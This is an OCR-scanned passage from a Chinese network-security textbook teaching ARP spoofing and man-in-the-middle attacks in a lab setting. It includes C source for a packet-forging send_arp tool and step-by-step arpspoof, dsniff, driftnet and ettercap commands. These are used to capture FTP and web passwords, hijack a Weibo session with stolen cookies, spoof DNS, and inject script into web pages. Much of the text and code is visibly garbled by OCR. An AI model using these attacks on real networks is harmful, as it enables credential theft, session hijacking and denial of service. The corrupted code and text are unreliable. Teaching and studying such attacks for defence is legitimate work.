地 址 /MAC 地 址 对 ) 在 2 一 10min 内 没有 使 用 ,那么 就 会 被 自动 删除 。 

如 果 要 查看 局 域 网 中 xf 计算 机 的 MAC 地 址 ,可 以 先 ping 该 计算 机 的 IP 地 址 ,然后 
通过 arp 命令 查看 信 

在 局 域 网 中 ,通信 前 必须 通过 arp 协议 来 完成 TP 地 址 转换 为 第 二 层 物理 地 址 ( 即 MAC 
地 址 )。arp 协议 对 网 络 安全 具有 重要 的 意义 。arp 欺骗 攻击 是 通过 伪造 IP 地 址 和 MAC 地 
址 实现 arp 欺骗 的 攻击 技术 。 
5.6.1 实例 : arp 欺骗 

。 实验 环境 
验 环 境 如 图 5-31 所 示 。 

KEN 192. 168. 85. 129), 192.168.85.129 

被 欺骗 者 (192. 168. 85. 1) 。 二 

2. arp 欺骗 过 程 Linux Windows XP 

第 1 步 : 被 欺骗 者 可 以 ping 通 欺 骗 者 。 欺骗 者 WU? 
被 欺骗 者 (192. 168. 85. 1) 执行 ping 192. 168. 图 5-31 实验 环境 
85.129 -n 1 命令 ,可 以 ping 通 。 然 后 执行 arp -a 
命令 查看 arp 缓存 ,得 知 欺骗 者 (192. 168. 85. 129) MAC 地 址 为 00-0c-29-d5-91-01. 
如 图 5-32 所 示 。 


192.168.85.1 


图 5-32 被 欺骗 者 可 以 ping 通 欺骗 者 
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第 2 步 : 进行 arp 欺骗 。 如 图 5-33 所 示 ,欺骗 者 (192. 168. 85. 129) 先 执行 ifconfig eth0 
命令 ,查看 本 网 卡 的 MAC 地 址 ,然后 执行 . /send arp. o 192. 168. 85. 129 00:0c:29:d5:91: 
11 192. 168. 85.1 00:50:56:c0:00:08 1 命令 ,对 192. 168. 85. 1 进行 arp 欺骗 。 其 中 ,send_ 
arp. o 语法 为 


send arp src ip addr src hw addr targ ip addr tar hw addr number 


rootGlocalho 
XfHD MICO EEV SAO 标签 @) MHW 
[rootelocalhost 7]* ifconfig ethO 
etho Link encap:Ethernet HWaddr 00:0C D5:91:01 
inet addr:192 29 B 68.85 
2Of f :ff 1/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric: 
RX packets:4509 errors:0 dropped:0 overruns:O fr. 
TX packets: dropped:0 overruns:0 carrier:O 
collisions:0 txqueuelen:1000 
RX byt 127708 (4.8 MiB) TX bytes:301200 (294.1 KiB) 


T» 


inet6 addr: fes 


Interrupt:169 Base address:0x2000 ( 此 MAC 地 址 不 要 和 其 他 网 “| 
卡 的 MAC 地 址 相同 


You have mail in /var/spool/mai1/i 
[rootelocalhost ~]# ./se 
o8 } 


t 


36. 


[rootelocalhost ~]# 


图 5-33 ”进行 arp 欺骗 


提示 : 被 欺骗 者 (192.168. 85. 1)MAC 地 址 的 获得 可 以 先 执行 ping 192. 168. 85. 129 命 
令 , 然 后 执行 arp -a 命令 来 查看 arp ý. 

第 3 步 : 被 欺骗 者 不 可 以 ping 通 欺骗 者 。 如 图 5-34 所 示 , 先 执行 ping 192. 168. 85. 
129 -n 1 命令 ,不 可 以 ping 通 , 再 执行 arp -a 命令 查看 arp 缓存 ,可 知 192. 168. 85. 129 的 
MAC 地 址 已 变 。 


Settings Mdninistrator 


192.1 z 
et Addre Physical fddress _ 
5.129 '88-8c-29-45-9 


C:\Document and Setting ndninistrator>ping 
Pinging 192.168 29 with 32 byte 
Request tined out 


Ping statistics for 


Packets: Sent P cei 


Settings\hdnini 


图 5-34 被 欺骗 者 不 可 以 ping 通 欺 骗 者 


如 果 本 网 络 的 网 关 是 192. 168. 85. 254, 那 么 想 让 192. 168. 85. 100 不 能 访问 互联 网 ,就 

可 以 执行 命令 “. /send_arp. o 192. 168. 85 ” 假 MAC*192. 168. 85. 100" 100 的 MAC 
“1”, 对 192. 168. 85. 100 进行 arp 欺骗 。 可 以 每 分 钟 执行 一 次 该 命令 ,192. 168. 85. 100 得 
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不 到 正确 的 到 网 关 的 arp 映射 表 项 ,就 无 法 访问 互联 网 了 。 
3. 源 程序 
CD 头 文件 send_arp. h: 


3t include < stdlib.h» 

# include < stdio. h> 

# include < sys/socket. h> 

# include < sys/types. h> 

# include < sys/ioctl.h» 

# include < errno. h> 

# include < netdb. h> 

# include < net/if. h> 

# include < netinet/ip. h> 

# include < netinet/in. h> 

# include < netinet/ip_icmp. h> 
# include < string. h> 

# include < signal. h> 

# include < arpa/inet. h> 

# include < linux/if_ether. h> 


# define ETH_HW_ADDR_LEN 6 

# define IP_ADDR_LEN 4 

# define arp_FRAME_TYPE 0x0806 
# define ETHER_HW_TYPE 1 

# define IP_PROTO_TYPE 0x0800 
# define OP arp REQUEST 2 

# define OP arp QUEST 1 

# define DEFAULT DEVICE "eth0" 


char usage[] = ("send arp: sends out custom arp packet. Mn" 
"usage: send arp src ip addr src hw addr targ ip addr tar hw addr number"); 


struct arp packet 

t 
u char targ hw addr[ETH HW ADDR LEN]; 
u char src hw addr[ETH HW ADDR LEN]; 
u short frame type; 
u short hw type; 
u short prot type; 
u char hw addr size; 
u char prot addr size; 
u short op; 
u char sndr hw addr[ETH HW ADDR LEN]; 
u char sndr ip addr[IP ADDR LEN]; 
u char rcpt hw addr[ETH HW ADDR LEN]; 
u char rcpt ip addr[IP ADDR LEN]; 
u char padding[18]; 

}; 


void die (char *); 
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void get ip addr (struct in_addr * , char *); 
void get hw addr (char * , char * ); 


(2) Wi XC fF send arp. c: 


# include "send arp.h" 


void die (char * str) 


( 


void get ip addr (struct in addr * in addr, char * str) 


{ 


fprintf(stderr, " % s\n", str); 
exit(1); 


struct hostent * hostp; 
in_addr -> s addr = inet addr(str); 
if(in addr-» s addr -- -1) 
{ 
if ((hostp = gethostbyname(str))) 


bcopy(hostp- »h addr, in_addr, hostp- »h length); 


else { 


fprintf(stderr, "send arp: unknown host % s\n", str); 


exit(1); 


void get hw addr (char * buf, char * str) 


{ 


int i; 
char c, val; 
for(i = 0; i< ETH HW ADDR LEN; i++) 
{ 
if (!(c = tolower( * str++))) 
die("Invalid hardware address"); 
if (isdigit(c)) 
val = c = '0*:; 
else if (c >= 'a'&&c<= 'f') 
val = c - 'a'* 10; 
else 
die("Invalid hardware address"); 
*buf = val««4; 
if (!(c = tolower( * str++))) 
die("Invalid hardware address"); 
if (isdigit(c)) 


wal 6 * 
else if (c >= 'a'&&c<= 'f') 
val = c - 'a't10; 


else 
die("Invalid hardware address"); 
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* buf++| = val; 
if ( * str == ':' 
SETIF? 


int main (int argc, char * argv[]) 
{ 
struct in_addr src_in_addr, targ_in_addr; 
struct arp_packet pkt; 
struct sockaddr sa; 
int sock; 
int j, number; 
if (argc != 6) 
die(usage); 


sock = socket(AF INET, SOCK PACKET, htons(ETH P Rarp)); 
if (sock « 0) 
{ 

perror("socket"); 

exit(1); 


number - atoi(argv[5]); 


pkt.frame type - htons(arp FRAME TYPE); 

pkt.hw type - htons(ETHER HW TYPE); 

pkt.prot type = htons(IP PROTO TYPE); 

pkt.hw addr size - ETH HW ADDR LEN; 
pkt.prot addr size - IP ADDR LEN; 

pkt.op = htons(OP arp QUEST); 

get hw addr(pkt.targ hw addr, argv[4]); 

get hw addr(pkt.rcpt hw addr, argv[4]); 

get hw addr(pkt.src hw addr, argv[2]); 

get hw addr(pkt.sndr hw addr, argv[2]); 

get ip addr(&src in addr, argv[1]); 

get ip addr(&targ in addr, argv[3]); 
memcpy(pkt.sndr ip addr, &src in addr, IP ADDR LEN); 
memcpy(pkt.rcpt ip addr, &targ in addr, IP ADDR LEN); 
bzero(pkt.padding, 18); 

strcpy(sa.sa data, DEFAULT DEVICE); 

for (j=0;j<number;j++) 


{ 
if (sendto(sock, &pkt, sizeof(pkt), 0, &sa, sizeof(sa)) < 0) 
{ 
perror("sendto"); 
exit(1); 
} 
} 
exit(0); 
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5.6.2 实例 : 中 间 人 攻击 (ARPspoof) 


中 间 人 攻击 (Man-in-the-Middle Attack. MITM 攻击 ) 是 一 种 古老 的 方法 ,但 仍 有 很 多 
变种 的 中 间 人 攻击 是 有 效 的 ,它们 能 够 很 容易 的 欺骗 外 行 并 且 进 行人 侵 。MITM 攻击 就 是 
攻击 者 扮演 中 间 人 并 且 实 施 攻击 。MITM 攻击 它 可 以 劫持 一 段 会 话 , 称 为 会 话 劫持 ,可 以 
窃取 密码 和 其 他 机 密 信 息 ,即使 使 用 了 SSL 加 密 。 

arp 欺骗 (arp 毒化 ) 也 被 称 为 arp 缓存 中 毒 arp 欺骗 攻击 ,是 在 内 网 的 MITM 攻击 。 
arp 欺骗 的 优势 是 通过 arp 协议 欺骗 ,对 整个 网 络 进行 欺骗 。 有 几 种 可 能 引起 arp 欺骗 的 方 
法 ,一 般 是 利用 内 网 中 的 被 攻陷 主机 或 使 用 自己 的 主机 (内 部 入 侵 )。 下 面 的 几 个 实例 采用 


内 部 入 侵 方 式 。 


实验 环境 如 图 5-35 所 示 。 


执行 命令 


一 
MOUSE 

192.168.0.101 攻击 者 : 192.168.0.100 
Android 网 关 : 192.168.0.1 Kali Linux 2.0 


图 5-35 实验 环境 


第 1 步 : 使 用 nmap 探测 局 域 网 内 的 主机 。 
nmap -sP 192. 168. 0. 1-254 ,如 图 5-36 所 示 。 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-09 10:28 CST 
Nmap scan report for 192.168.0.1 EDU ES 

Host is up (0.00047s latency). 

MAC Address: C8: 34:35: 14: AB: 18 (Tenda Technology Co.) 
Nmap scan report for 192. 168.0. 101 4647: 


Host is up. 
Nmap done: 254 IP addresses (3 hosts up) scanned in 9.42 seconds 
rootGdebian: -# [| 


, motQdebar- — *  — rootQdebav- — * — 
rootGdebian: ~# nmap -sP 192. 168.0. 1-254 


5-36 ”执行 nmap 命令 


第 2 步 : 使 用 ARPspoof 执行 arp 欺骗 ,毒化 被 欺骗 者 (192. 168. 0. 101) 。 
执行 如 下 命令 启用 IP 转发 。 


root@debian:~ # echo 1 > /proc/sys/net/ipv4/ip forward 


执行 命令 


arpspoof -i eth0 -t 192. 168. 0. 101 192. 168. 0. 1 ,将 被 欺骗 者 的 流量 重 定向 给 


攻击 者 ,再 由 攻击 者 转发 给 网 关 , 如 图 5-37 所 示 。 
第 3 步 : 使 用 ARPspoof 执行 arp 欺骗 ,毒化 网 关 (192. 168. 0. DD. 
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root@debian: ~ eoo 


root debian: ~ root@debian: ~ root@debian: - x 

root@debian: ~# arpspoof -i eth0 -t 192.168.0.101 192. 168. 0. 1 

3c: 97: e: fO: bS: bb c8: aa: 21: df: d: 6d 0806 42: arp reply 192.168.0.1 is-at 3c; 97: e: f0: b5: bb 
: : aa: 21: df: d: 6d 0806 42: arp reply 192.168.0.1 is-at 3c:97:e 

Bc: 97: e: f0: b5: bb c8: aa: 21: df! d: 6d 0806 42: arp reply 192.168.0.1 is-at 3c:97:e: f0: b5: bb 


图 5-37 执行 arpspoof 命令 ,毒化 被 欺骗 者 


执行 命令 arpspoof -i eth0 -t 192. 168. 0. 1 192. 168. 0. 101 ,将 网 关 的 流 
者 ,再 由 攻击 者 转发 给 被 欺骗 者 ,如 图 5-38 所 示 。 


定向 给 攻击 


root@debian: ~ eoo 
root@debian: - root()debian: ~ root@debian: - root) debian: ~ 


root debian: -4 arpspoof -i eth0 -t 192.168.0.1 192. 168.0. 101 

: 35:14: ab: 18 0806 42: arp reply 192.168.0.101 is-at 3c:97:e: f0: 
18 0806 42: arp reply 192.168.0.101 is-at 3c fo: 
18 0806 42: arp reply 192.168.0.101 is-at 3c: fO: 
3c: 97: e: f0: b5: bb c8: 3a: 35: 14: ab: 18 0806 42: arp reply 192. 168. 0. 101 is-at 3c: 97: e: f0: 


图 5-38 ”执行 arpspoof 命令 ,毒化 网 关 
第 4 步 : 执行 driftnet 命令 ,捕获 图 片 。 
在 攻击 者 的 主机 上 执行 如 下 命令 : 
root(Qdebian:-- # driftnet - i eth0 


在 被 欺骗 者 的 手机 上 用 浏览 器 访问 新 闻 页 面 。 此 时 ,攻击 者 的 主机 上 会 捕获 到 新 闻 页 
面 上 包含 的 图 片 ,如 图 5-39 所 示 。 


图 5-39 ”执行 driftnet 命令 ,捕获 图 片 


第 5 步 : 执行 dsniff 命令 ,捕获 密码 。 
在 攻击 者 的 主机 上 执行 如 下 命令 


root(Zdebian:- # dsniff - i ethO 


在 被 欺骗 者 的 手机 上 用 浏览 器 访问 FTP 站 点 ,输入 用 户 名 和 密码 后 ,攻击 者 主机 上 的 
dsniff 成 功 捕获 了 FTP 的 用 户 名 和 密码 ,如 图 5-40 所 示 。 
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rootQdebian:-4 dsniff -i ethO 
: tening on ethO 


9/09/15 11:54:13 tcp debian. 42559 -> 62.232.6.46.21 (ftp) 


ER anonymous 
PASS mozilla&Gexample. com 


9/09/15 11:54:23 tcp debian. 42560 -> 62.232.6.46.21 (ftp) 


USER ztg 
'ASS aaaaaa 


Croot&debian: -# Bj 
图 5-40 ”执行 dsniff 命令 ,捕获 密码 


5.6.3 实例 : 中 间 人 攻击 (Ettercap 一 GUD 
ettercap 是 一 个 多 用 途 的 开源 工具 ,可 以 用 来 执行 嗅 探 .主机 分 析 等 。Ettercap 可 以 使 


用 GUI 和 CLI R. 
实验 环境 如 图 5-41 所 示 。 


WIKRE A a 
192.168.0.101 
Android 


l h. 
被 欺骗 者 B ieri 
192.168.0.102 
i i 攻击 者 192.168.0.100 
Windows/Linux 网 关 : 192.168.0.1 li 2.0 
图 5-41 实验 环境 


1. 对 目标 主机 进行 arp 欺骗 ,捕获 明文 密码 
第 1 步 : 启动 ettercap。 攻 击 者 ,打开 终端 .执行 命令 ettercap -G. 启 动 ettercap 图 形 界 


面 ,或 者 ,依次 选择 “应 用 程序 ”一 “09- 嗅 探 /欺骗 ”一 ettercap-graphical 命令 ,启动 ettercap 


图 形 界面 。 
然后 依次 选择 sniff->unified sniffing 命令 ,根据 自己 的 要 求 选择 要 抓 包 的 网 络 接口 ,如 


图 5-42 所 示 o 


图 5-42 启动 ettercap 


第 2 步 : 扫描 主机 。 在 ettercap 图 形 界面 中 .依次 选择 Hosts Scan for hosts 命令 , 扫 
描 完 成 后 再 选择 Scan for hosts( 有 时 候 一 次 扫描 不 完全 ) ,然后 选择 Hosts list, 查 看 扫描 到 


的 主机 列表 ,如 图 5-43 所 示 。 
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Add to Target 1 


2182 known services 
Lua: no scripts were specified, not starting up! 
[Starting Unified sniffing... 


Randomizing 255 hosts for scanning... 
[Scanning the whole netmask for 255 hosts... 
|1 hosts added to the hosts list... 
Randomizing 255 hosts for scanning... 
[Scanning the whole netmask for 255 hosts... 
|2 hosts added to the hosts list... 
Randomizing 255 hosts for scanning... 
[Scanning the whole netmask for 255 hosts... 
|2 hosts added to the hosts list... 


图 5-43 扫描 主机 


第 3 步 : 选择 攻击 目标 。 选 择 192. 168. 0. 101, 单 击 Add to Target 1, 然 后 选择 
192.168. 0. 1 ,再 单 击 Add to Target 2, 如 图 5-44 所 示 o 


| DeleteHost | AddtoTargeti | Add to Target 2 


[Starting Unified sniffing... 


Randomizing 255 hosts for scanning... 
Scanning the whole netmask for 255 hosts... 

hosts added to the hosts list... 
Randomizing 255 hosts for scanning... 
[Scanning the whole netmask for 255 hosts... 
[2 hosts added to the hosts list... 
Randomizing 255 hosts for scanning... 
[Scanning the whole netmask for 255 hosts... 
[2 hosts added to the hosts list... 

lost 192.168.0.101 added to TARGET1 


5-44 选择 攻击 目标 


第 4 步 : 明确 攻击 方式 。 依 次 选择 Mitm— ARP poisoning-Sniff remote connections 
命令 ,在 打开 对 话 框 中 单 击 “确定 ”按钮 。 告 诉 被 欺骗 者 A(192. 168. 0. 101) 攻击 者 
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(192. 168. 0. 100) 是 网 关 (192. 168. 0. 1) ,使 得 被 欺骗 者 A 把 所 有 数据 流量 全 部 发 给 攻击 
者 ,然后 抓 包 捕获 密码 。ettercap 可 以 自动 完成 这 些 步骤 ,只 要 选 好 目标 主机 即 可 。 

在 被 欺骗 者 A 的 终端 模拟 器 中 执行 arp 命令 ,可 以 看 arp 地 址 表 , 网 关 (192. 168. 0. 1) 
MAC 是 3c:97:0e:f0:b5:bb( 攻 击 机 ) ,arp 缓存 毒化 成 功 。 

第 5 步 : 开始 监听 。 依 次 选择 Start Start sniffing 命令 ,开始 监听 。 

第 6 步 : 在 被 欺骗 者 A 的 手机 上 用 浏览 器 访问 http: //rpmfusion. org/ ,输入 用 户 名 和 
密码 。 

第 7 步 : 攻击 者 主机 ,ettercap 成 功 捕获 了 用 户 名 和 密码 ,如 图 5-45 所 示 。 


ettercap 0.8.2 eoo 
Start Targets Hosts View Mitm Filters Logging Plugins Info 
Host List x | 


IP Address MAC Address Description 


192.168.0.101 C8:AA:21:DF:0D:6D 


| Delete Host | Add to Target 1 ] Add to Target 2 


|angommg 235 nosis TU scing. ESSE — 
[Scanning the whole netmask for 255 hosts. 

|2 hosts added to the hosts list... 

IHost 192.168.0.101 added to TARGET1 

[Host 192.168.0.1 added to TARGET2 


|ARP poisoning victims: 
GROUP 1: 192.168.0.101 C8:AA:21:DF:0D:6D 


GROUP 2 : 192.168.0.1 C8:3A:35:14:48:18 

[Unified sniffing already started.. 

HTTP : 46.105.55.72:80 -> USER: Login PASS: aaaaaa INFO: http;//rpmfusion.org/ 
CONTENT: actionzlogin&name ztg&password-aaaaaa&login- Login 


图 5-45  ettercap 成 功 捕获 了 用 户 名 和 密码 


2. 进行 Cookie 劫持 ,登录 被 欺骗 者 的 腾讯 微 博 

使 用 ettercap 抓 取 被 欺骗 者 B 的 Cookie. M mi S: Bl. Cookie 劫持 ,并 登录 被 欺骗 者 B 的 
腾讯 微 博 。 

第 1 步 : 构建 工具 。 使 用 Firefox 浏览 器 、Scripish 或 GreaseMonkey, Original Cookie 
Injector, 构 建 一 个 可 以 在 网 页 中 嵌入 Cookie 的 工具 。 

CD 先 安装 Greasemonkey 或 者 Scripish ,然后 重启 浏览 器 。 

Scripish 下 载 地 址 : https://addons. mozilla. org/zh-CN/ firefox/addon/scriptish/. 

GreaseMonkey F 载 地 hk: https://addons. mozilla. org/en-US/firefox/addon/ 
greasemonkey/ 。 

© 再 安装 Original Cookie Injector, 然 后 重启 浏览 器 。 

Original Cookie Injector 的 下 载 地 址 为 : http://userscripts-mirror. org/scripts/show/ 
119798 , 单 击 右上 角 的 Install 按钮 安装 程序 。 

第 2 步 : 扫描 主机 。 在 ettercap 图 形 界面 中 依次 选择 Hosts Scan for hosts 命令 , 扫 
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描 完 成 后 再 选择 Scan for hosts( 有 时 候 一 次 扫描 不 完全 ) ,然后 选择 Hosts list, 查 看 扫描 到 
的 主机 列表 。 

第 3 步 : 选择 攻击 目标 。 选 择 192. 168. 0. 102, 单 击 Add to Target 1 ,然后 选择 192. 
168. 0. 1 , 单 击 Add to Target 2, 

第 4 步 : 明确 攻击 方式 。 依 次 选择 Mitm— ARP poisoning—>Sniff remote connections 
命令 ,然后 单 击 “确定 按钮。 告诉 被 欺骗 者 B(192. 168. 0. 1020 攻击 者 (192. 168. 0. 1000 是 
网 关 (192. 168. 0. 1) .使 得 被 欺骗 者 B 把 所 有 数据 流量 全 部 发 给 攻击 者 ,然后 抓 包 捕获 密 
人 码 。ettercap 可 以 自动 完成 这 些 步骤 ,只 要 选 好 目标 主机 即 可 。 

第 5 步 : 开始 监听 。 依 次 选择 Start Start sniffing 命令 ,开始 监听 。 

第 6 步 : 在 被 欺骗 者 B 的 主机 上 用 浏览 器 访问 访问 腾讯 微 博 http: //t. qq. com, 输 入 用 
户 名 和 密码 。 

第 7 步 : 查看 被 欺骗 者 B 的 网 络 链接 。 在 ettercap 图 形 界 面 , 依 次 选择 View 
Connections 命令 ,查看 被 欺骗 者 B 的 网 络 链接 ,如 图 5-46 所 示 。 


ettercap 0.8.2 eoo 


Start Targets Hosts View Mitm Filters Logging Plugins Info 


| connectors » |connectiengatagd 


Host filter Protocol filter. 


Connection state filter 


I « | UcP EUDP 国 other @ Actie @ ide Closing ME Closed 图 Kiled 
Host Port - Host ‘Port Proto State — TX Bytes RX Bytes 
| 1921680100 0 — - 103.95 0 opening 0 0 | 
1921680.102 0 — - 103.96 0 opening 0 0 
192.168.0.102 0 — - 10394 0 opening 0 0 
192.168.0.102 6166 - 10394 53 UDP ide 31 139 
192.168.0.102 6166 - 10.3.9.5 53 UDP ide 3 155 
192.168.0.102 6166. - 10396 53 UDP ide 3 139 
92.1E ).102 52694 5.39.2 8C P ose 44€ 
192.168.0.102 35157 - 91.189.89.22 — 443 TCP killed 506 3554 
192.168.0.102 35158 - 91.189.89.22 — 443 TCP killed 506 ^ 3554 
192.168.0.102 35159 - 91.189.89.22 — 443 TCP killed 506 3554 
View Details Jl Kill Connection Jí Expunge Connections 
[EN 


GROUP 1 : 192.168.0.102 68:17:29:8A:D6:BC 


GROUP 2 : 192.168.0.1 C8:3A:35:14:AB:18 
Unified sniffing already started... 


图 5-46 ”查看 被 欺骗 者 B 的 网 络 链接 


第 8 步 : 查看 捕获 数据 包 的 详细 信息 .获得 Cookie。 在 图 5-48 中 双击 某 个 链接 ,查看 
捕获 数据 包 的 详细 信息 ,如 图 5-47 所 示 .把 Cookie 后 面 的 字段 复制 下 来 。 注 意 带 下 划 线 的 
行 , 要 双击 这 样 的 链接 (数据 包 ) ,这 是 刚 开 始 捕获 的 数据 包 。 

第 9 步 : 成 功 登录 腾讯 微 博 。 在 攻击 者 主机 访问 腾讯 微 博 的 登录 页 面 http://t. qq. com. 
按 Alt 十 C 组合 键 ,弹出 Original Cookie Injector 对 话 框 ,将 Cookie 值 粘贴 进去 , 单 击 OK fk 
钮 ,然后 按 F5 键 刷 新 页 面 ,成 功 登录 腾讯 微 博 , 如 图 5-48 所 示 。 
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“9 GecKO/ ZIIVYIVI FIreTOX/Z9.0. E 
ccept : text/html ,application/xhtmlexml „applicatio pu 
/xml ;q-9.9,*/*;q-0.8. 
ccept-Language: zh-cn,zh;q-9.8,en-us;q-6.5,9n;0-9. ^ Content-Type: text/html; charset-uti-8. 
Content-Length: 151. 
Accept- Encoding: gzip, deflate. Tt 
LA 人 t .qq com/bLuesky2229 . Cache-Control: post-check-6,pre-check-9. 
Expires: Wed, 09 Sep 2015 10:09:48 GMT. 
Prag 
Vary: Accept- Encoding. 
Content -Encoding: gzip. 


416; pt « client ipzae227 10000919947 
Gaab402c3dlb; ptispscnc; uin-o! 

MUrWXd; p uii |88; skey-tSndvs3 
ILbmUxUAITDuvpgfj eokui 

viBjpNanAGA_ 


(Connection: keep-alive. 
[o dene | miectoata ()| mectre (j| kucomecion | 


GROUP 1 : 192.168.0.102 68:17:29:8A:D6:BC 


GROUP 2 : 192.168.0.1 C8:34:35:14:48:18. 


图 5-47 查看 捕获 数据 包 的 详细 信息 并 获得 Cookie 


bluesky ow 


| 7 odxmmmü ESAN 


aen mre [Qi 


5-48 成功 登录 腾讯 微 博 


5.6.4 实例 : 中 间 人 攻击 (Ettercap 一 CLD 


实验 环境 如 图 5-49 所 示 。 


1. 中 间 人 攻击 ,捕获 图 片 
第 1 步 : 执行 ettercap 命令 ,进行 arp 欺骗 。 在 攻击 者 的 主机 上 执行 如 下 命令 ， 


如 图 5-50 所 示 。 
root@debian: ~ # ettercap -T -M arp /// /// -q -i eth0 


-T: 使 用 文本 模式 启动 。 
-M: 使 用 中 间 人 攻击 ,后 面 指定 arp 的 攻击 方式 及 两 个 目标 。 
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-q: 安静 模式 (不 回 显 ) 。 
-i: 指定 监听 的 网 络 接口 。 


4 
— bd 


被 其 骗 者 


192.168.0.101 攻击 者 : 192.168.0.100 
Android 网 关 : 192.168.0.1 Kali Linux 2.0 
图 5-49 实验 环境 
root@debian: ~ eoo 
root@debian: ~ x 


root&lebian:-& ettercap -T -M arp /// /// -q -i ethü 
lettercap 0.8.2 copyright 2001-2015 Ettercap Development Team 


Listening on: 
eth0 -> 3C: 97: 0E: FO: B5: B8 

192. 168. 0. 100/255. 255. 255. 0 

fe80: : 3e97: ef f: fef0: b5bb/ 64. 


|SSL dissection needs a valid 'redir command on' script in the etter. conf file 
Privileges dropped to EUID 65534 EGID 65534... 


33 plugins 
42 protocol dissectors 

57 ports monitored 

120388 mac vendor fingerprint 

|1766 tcp OS fingerprint 

12182 known services 

Lua: no scripts were specified, not starting up! 


Randomizing 255 hosts for scanning... 
Scanning 


I |===== 


2 hosts added to the hosts list... 

|ARP poisoning victims: 

GROUP 1 : ANY (all the hosts in the list) 
GROUP 2 : ANY (all the hosts in the list) 
|Starting Unified sniffing... 

Text .enty Interface activated.. 

Hit 'h' for inline help 


HTTP : 46.105.55.72:80 -> USER Login PASS: aaaaaa INFO: http://rpmfusion. org/ 
ICONTENT: actionslogin&name-ztg&password-aaaaaa&loginsLogin 


5-50 ”执行 ettercap 命令 来 进行 arp 欺骗 
第 2 Jb. 执行 driftnet 命令 ,捕获 图 片 。 在 攻击 者 的 主机 上 执行 如 下 命令 : 
root@debian:~# driftnet - i ethO 


在 被 欺骗 者 的 手机 上 用 浏览 器 访问 新 闻 页 面 。 此 时 ,攻击 者 的 主机 上 会 捕获 到 新 闻 页 
面 上 包含 的 图 片 。 

2. DNS 劫持 

ettercap 提供 了 很 多 有 用 的 插件 。 在 ettercap 图 形 界面 下 依次 选择 Plugins Mange 
the plugins 命令 ,然后 双击 启动 插件 。 插 件 启动 后 ,插件 名 前 会 显示 x* 号 ,如 图 5-51 所 示 。 

第 1 步 : 编辑 dns spoof 插件 的 配置 文件 。 在 Kali Linux F ,ettercap 的 配置 文件 和 脚 
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本 文件 存放 在 /usr/share/ettercap/ 或 /etc/ettercap/ 目 录 下 。 编 辑 dns_spoof 插件 的 配置 文 
件 /etc/ettercap/etter. dns, 在 etter. dns 文件 中 添加 一 条 A 记录 ,把 www. baidu. com 转向 
127.0.0.1, 如 图 5-52 所 示 。 这 会 造成 被 欺骗 者 无 法 访问 百度 首页 。 


ettercap 0.8.2 eoo 

Start Targets Hosts View Mitm Filters Logging Plugins Info 
Plugins x M x 
"mas i1 Load a plugin... 


arp-cop B Report suspicious ARP activity 
autoadd Automatically add new victims in the target range 
chk-poison Check if the poisoning had success 

* dns.spoof E Sends spoofed dns replies 


dos. attack Run a d.o.s. attack against an IP address 


(1766 tcp OS fingerprint 
2182 known services 
ua: no scripts were specified, not starting up! 
tarting Unified sniffing... 


ctivating dns. spoof plugin... 


5-51 在 ettercap 图 形 界面 下 启动 插件 


| pe mm etterd rmm 

nmo = |[m] 保存 (5) | | 三 | ee LJ 
67www.alor.org A 127.0.0.1 

68www.naga.org A 127.0.0.1 

E pete hme AAAA 2001:db8::2 

70 | 
71www.baidu.com A 127.0.0.1 


Matab v MANER :8 v "uon v x 
图 5-52 编辑 dns spoof 插件 的 配置 文件 


第 2 步 : 执行 ettercap 命令 ,进行 DNS 劫持 。 在 攻击 者 的 主机 上 执行 如 下 命令 ， 
如 图 5-53 所 示 。 

* ettercap -Tq -i eth0 -P dns spoof -M arp:remote //192.168.0.101/ //192.168.0.1/ 

在 命令 行 上 使 用 插件 要 加 上 选项 -P。 

第 3 步 : 被 欺骗 者 访问 百度 首页 。 在 被 欺骗 者 的 手机 上 用 浏览 器 访问 百度 首页 ,此 时 ， 
无 法 访问 百度 首页 ,不 过 可 以 正常 访问 IP 和 其 他 网 址 。 

在 攻击 者 的 主机 上 可 以 看 到 百度 域名 被 解析 为 127. 0. 0.1, 如 图 5-53 中 的 最 后 一 行 。 

第 4 步 : FE Ctrl 十 C 组 合 键 , 停 止 DNS 劫持 。 

3. 替换 HTML 代码 

ettercap 还 有 很 强大 的 过 滤 脚 本 功能 ,通过 使 用 过 滤 脚 本 ,可 以 对 捕获 的 数据 包 做 修改 
(替换 网 页 内 容 、 替 换 下 载 内 容 \ 在 网 页 中 插入 代码 等 ) ,然后 转发 给 被 欺骗 主机 。 

第 1 步 : 编辑 文件 replace. filter。 新 建 一 个 过 滤 脚 本 文本 replace. filter, 内 容 如 下 。 

if (ip.proto == TCP && tcp.dst == 80) { 


if (search(DATA. data, "Accept - Encoding" )) ( 
replace( "Accept - Encoding", "Accept - Rubbish! "); 
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* note: replacement string is same length as original string 
msg( "zapped Accept - Encoding! n") ; 


J 
} 
if (ip. proto == TCP && tcp. src == 80) { 
replace("« head»", "< head >< script type = "text/javascript"» alert('HTTP 数据 包 内 容 被 蔡 
换 ');</script >"); 
replace("« HEAD >", "< HEAD >< script type = "text/javascript"» alert( 'HTTP 数据 包 内 容 被 替 
换 ');</script >"); 
msg( "成 功 替换 HTTP 数据 包 内 容 !\h") 
} 
root@debian: ~ eoo 


root&lebian:-& ettercap -Tq -i eth0 -P dns spoof -M arp: remote //192.168.0. 101/ //192.168.0.1/ |. 
lettercap 0.8.2 copyright 2001-2015 Ettercap Development Team 


Listening on: 
ethü -> 3C 97: 0E: FO: BS: BB. 

192. 168. 0. 100/255. 255. 255.0. 

fe80: : 3e97: etf: fef0: bSbb/64 


ss. dissection needs a valid 'redir command on script in the etter. conf file 
Privileges dropped to EUID 65534 EGID 65534.. 


33 plugins 

42 protocol dissectors 

57 ports monitored 
[20388 mac vendor fingerprint 
1766 tcp os fingerprint 
|2182 known services 


Lua: no scripts specified, not starting upl 


Scanning for me 


d targets (2 hosts). 
=>] 100.00 * 


|2 hosts added to the hosts list... 
APP poisoning victims: 


GROUP 1 : 192. 168.0. 101 CB: AA: 21: DF: 0D: 6D 


GROUP 2 : 192.168.0.1 C8: 3A: 35: 14: AB: 18 
Starting Unified smiffing. 


Text only Interface activated... 
ut 'h for inline help 
Activating dns. spoof plugin... 


dns spoof: A [www baidu. com) spoofed to [127.0.0.1] 


5-53 ”执行 ettercap 命令 并 进行 DNS 劫持 


该 脚本 可 以 替换 HTML 代码 中 的 一 head ,在 网 页 上 弹出 提示 框 。 
